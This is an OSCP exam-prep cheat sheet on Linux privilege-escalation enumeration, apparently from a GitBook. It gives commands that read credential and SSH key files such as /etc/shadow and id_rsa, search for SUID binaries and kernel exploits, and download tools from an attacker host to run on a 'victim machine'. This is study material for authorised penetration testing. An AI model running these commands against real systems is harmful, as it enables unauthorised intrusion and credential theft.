📘
OSCP Exam Prep
OSCP Exam Prep
OSCP Exam Prep
  • Reference List
  • Guideline
  • Commons
    • Basic Scans
    • Service Enumeration
      • HTTP(S) (80 / 443)
      • SMB (139 / 445)
      • FTP (21)
      • DNS (53)
      • SSH (22)
      • LDAP (389/636/3268)
      • Kerberos (88)
      • SNMP (161)
      • SMTP (25)
      • RDP (3389)
      • Evil-WinRM (5985/5986)
      • MYSQL (3306)
      • MSSQL (1433)
    • Default/Common Credentials
    • Shells
      • TTY Shell
    • File Transfer
    • KeePass Database
    • Port Forwarding
    • File Metadata
  • Attacks
    • Run a command x times
    • Public Exploits
    • User Creation
    • Password Cracking
      • Using custom wordlists
    • LFI/RFI
    • SQLi
    • PwnKit
    • SAM and SYSTEM files
    • Phishing for Access (Requires MailSVR)
    • GitDumper
  • Enumeration
    • Linux
    • Windows
  • Privilege Escalation
    • Linux
    • Windows
  • Port Forwarding Extras
    • Linux
    • Windows
  • Active Directory
    • Enumeration
    • Lateral Movement
    • Privilege Escalation
Powered by GitBook
On this page
  • Online Resource
  • Points of Interest
  • Sudo Things
  • System Information
  • User Roles
  • Crontab
  • Special Bits
  • Interesting Files
  • Writable Directories
  • Catch Repeating Processes
  • Monitoring Processes with PsPy
  • Reading Binaries
  • Finding Kernel Exploits
  • Automated Enumeration
  • LinPeas
  1. Enumeration

Linux

PreviousGitDumperNextWindows

Last updated 3 months ago

Online Resource

Points of Interest

Sudo Things

sudo -l
sudo -V | grep -i "sudo ver"

System Information

Basic system information: uname -a
CPU information: lscpu
Disk information: lsblk
USB information: lsusb
Kernel Version: cat /etc/issue

Network: ss -nltp

User Roles

id
groups

Crontab

crontab -l
cat /etc/crontab

ls -lah /etc/cron.*
grep -i "CRON" /var/log/syslog

Special Bits

find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

Interesting Files

cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
ls -la /var/www
ls -la /opt

cat /root/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat /home/<user>/.ssh/id_rsa
cat /home/<user>/.ssh/id_ecdsa
cat /home/<user>/.ssh/authorized_keys

find / -name config.php -type f 2>/dev/null
find / -name doas.conf -type f 2>/dev/null
find / -name apache* -type d 2>/dev/null

find / -name *.txt -type f 2>/dev/null
find / -name *.sh -type f 2>/dev/null
find / -name .ht* -type f 2>/dev/null

find / -name id_rsa -type f 2>/dev/null
find / -name id_ecdsa -type f 2>/dev/null
find / -name authorized_keys -type f 2>/dev/null

find /home/ -name local.txt -type f 2>/dev/null
find /root/ -name proof.txt -type f 2>/dev/null
find / -name local.txt -type f 2>/dev/null
find / -name proof.txt -type f 2>/dev/null

Writable Directories

find / -writable -type d 2>/dev/null

Catch Repeating Processes

watch -n 1 "ps aux"
watch -n 1 "ps aux | grep -i <keyword>"

while sleep 1; do ps aux; done
while sleep 1; do ps aux | grep -i <keyword>; done

Monitoring Processes with PsPy

On Kali Machine:
 wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
 python3 -m http.server 80
 
On Victim Machine:
 wget https://192.168.45.200/pspy64 && chmod +x pspy64
 ./pspy64

Reading Binaries

strings <file>

Finding Kernel Exploits

SearchSploit:
    searchploit <keyword>
    searchsploit -m <EDB-ID>

For Kernal Vulnerabilities:
    searchsploit "linux kernel <distro version> Local Privilege Escalation" | grep "<kernel versions>"
    
    <distro version> = cat /etc/issue
    <kernel versions> = uname -r
    
    Example: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v "< 4.4.0" | grep -v “4.8”

Automated Enumeration

LinPeas

On the Attacker:
    /usr/share/peass/linpeas/linpeas.sh
    /usr/share/peass/linpeas/linpeas_small.sh
    wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/linpeas.sh
    
Transfer the respective executable onto compromised system
Run the executable and enumerate the output

WADComs
GTFOBins
Logo
Logo